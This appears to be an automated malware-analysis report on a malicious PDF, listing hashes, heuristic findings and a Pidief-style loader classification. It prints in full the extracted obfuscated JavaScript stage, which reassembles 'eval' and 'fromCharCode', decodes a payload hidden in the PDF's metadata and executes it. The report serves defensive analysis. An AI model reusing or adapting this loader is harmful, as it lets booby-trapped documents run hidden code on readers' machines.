PDF malware analysis — malicious · 45ced9057b0d623a

MALICIOUS

PDF

44.6 KB Authoring application: substr First seen: 2012-06-14

MD5: 04cece7dd6a231cb26091d414c8364fc SHA-1: 5660ecd38946756ab72bc49a1598996f77ba028b SHA-256: 45ced9057b0d623a3478e11a1a73b63acabb5c77ae12c010bdffb5269c9f9697

86 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious Order: Malicious JavaScript

The PDF file contains embedded JavaScript, indicated by heuristic firings PDF_JAVASCRIPT and PDF_JS. The ML classifier also flagged the PDF as malicious with a high probability. The document body 'substr split test' is likely a placeholder or a very basic lure. The embedded JavaScript is the primary mechanism for malicious activity, likely intended to exploit vulnerabilities or download further payloads, though the specific actions are not detailed in the provided evidence.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAFC7 442 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xAFC7	442 bytes
SHA-256: `9f1e173b3a0217666d285a201a6e896f272ca836e16e47da4f9c3062ee89c634`
Preview script First 1,000 lines of the extracted script s2=''; v=producer; aa = v[v]; t='le'; b='v'; a="e".concat("a","n","b","w",b,"o"); s=a[0].concat(b,a[1],t[0]); e=aa()[s]; eox=e('tit'.concat(t)); q=eox[v](a.length-6,a.length+2); btniv=e(v[0].toUpperCase().concat(v[4],'ring.fr',a[6],q)); q=eox[v](t.length+12)[e(v[0].concat('ubject'))]('c'); k=q['len'.concat('gth')]; i=0; while(i!=k){ flbql = 1(q[i]) - (-1)(q[i-(-1)]); s2 = s2.concat(btniv(flbql)); i+=2; } e(s2);

SHA-256: 9f1e173b3a0217666d285a201a6e896f272ca836e16e47da4f9c3062ee89c634

Preview script

First 1,000 lines of the extracted script

s2='';
v=producer;
aa = v[v];
t='le';
b='v';
a="e".concat("a","n","b","w",b,"o");
s=a[0].concat(b,a[1],t[0]);
e=aa()[s];
eox=e('tit'.concat(t));
q=eox[v](a.length-6,a.length+2);
btniv=e(v[0].toUpperCase().concat(v[4],'ring.fr',a[6],q));
q=eox[v](t.length+12)[e(v[0].concat('ubject'))]('c');
k=q['len'.concat('gth')];
i=0;
while(i!=k){
	flbql = 1*(q[i]) - (-1)*(q[i-(-1)]);
	s2 = s2.concat(btniv(flbql));
	i+=2;
}
e(s2);

Open this report in the interactive analyzer, or submit your own file for analysis.